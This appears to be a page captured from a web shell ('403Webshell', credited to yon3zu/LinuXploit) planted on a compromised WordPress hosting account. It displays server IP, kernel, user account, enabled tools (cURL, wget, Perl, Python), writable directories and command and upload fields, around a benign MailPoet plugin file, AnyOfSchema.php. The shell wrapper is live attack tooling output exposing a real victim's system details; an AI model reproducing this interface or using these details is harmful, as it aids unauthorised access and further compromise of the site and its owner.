403Webshell
Server IP : 104.21.14.103  /  Your IP : 3.16.68.121
Web Server : LiteSpeed
System : Linux business53.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : giankuin ( 1871)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/home/giankuin/thietke365.net/wp-content/plugins/mailpoet/lib/Validator/Schema/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/home/giankuin/thietke365.net/wp-content/plugins/mailpoet/lib/Validator/Schema/AnyOfSchema.php
<?php declare(strict_types = 1);

namespace MailPoet\Validator\Schema;

if (!defined('ABSPATH')) exit;


use MailPoet\Validator\Schema;

// See: https://developer.wordpress.org/rest-api/extending-the-rest-api/schema/#oneof-and-anyof
class AnyOfSchema extends Schema {
  protected $schema = [
    'anyOf' => [],
  ];

  /** @param Schema[] $schemas */
  public function __construct(
    array $schemas
  ) {
    foreach ($schemas as $schema) {
      $this->schema['anyOf'][] = $schema->toArray();
    }
  }

  public function nullable(): self {
    $null = ['type' => 'null'];
    $anyOf = $this->schema['anyOf'];
    $value = in_array($null, $anyOf, true) ? $anyOf : array_merge($anyOf, [$null]);
    return $this->updateSchemaProperty('anyOf', $value);
  }

  public function nonNullable(): self {
    $null = ['type' => 'null'];
    $anyOf = $this->schema['anyOf'];
    $value = array_filter($anyOf, function ($item) use ($null) {
      return $item !== $null;
    });
    return $this->updateSchemaProperty('anyOf', $value);
  }
}

Youez - 2016 - github.com/yon3zu
LinuXploit